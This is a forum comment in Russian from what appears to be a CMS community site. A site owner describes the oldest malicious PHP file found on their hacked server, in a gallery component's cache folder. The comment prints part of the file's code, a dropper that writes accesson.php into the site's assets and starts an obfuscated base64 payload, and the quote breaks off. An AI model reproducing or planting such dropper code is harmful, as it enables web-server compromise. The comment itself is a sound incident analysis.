Edit template
PrismaCMS
Technologies
Topics
Blogs
Chats
Users
Projects
Tasks
Timers
API Schema
API
EN
Signin
Fi1osof
Кажется я нашел на своем сервере самый старый вредоносный файл. Появился 19-го числа (большинство же взломов было зафиксировано с 20-го числа).
assets/components/gallery/cache/_var_www_vhosts_{sitename}_.b7e3a964094cfe6e29fc9228bad6e7b2.php
С таким содержимым:
$s
=
$_SERVER
[
'DOCUMENT_ROOT'
]
.
'/assets/'
;
$s1
=
$s
.
'images/'
;
$fh
=
fopen
(
$s1
.
'accesson.php'
,
'w'
)
;
fwrite
(
$fh
,
'
<?php
echo
7457737
+
736723
;
$raPo_rZluoE
=
base64_decode
(
"Y"
.
chr
(
109
)
.
"F"
.
chr
(
122
)
.
chr
(
90
.
.
.
.
.
.
.
На вид очень похоже на то, что именно через этот файл и осуществлялся взлом, то есть уязвимость действительно в gallery была.
Вернуться к списку комментариев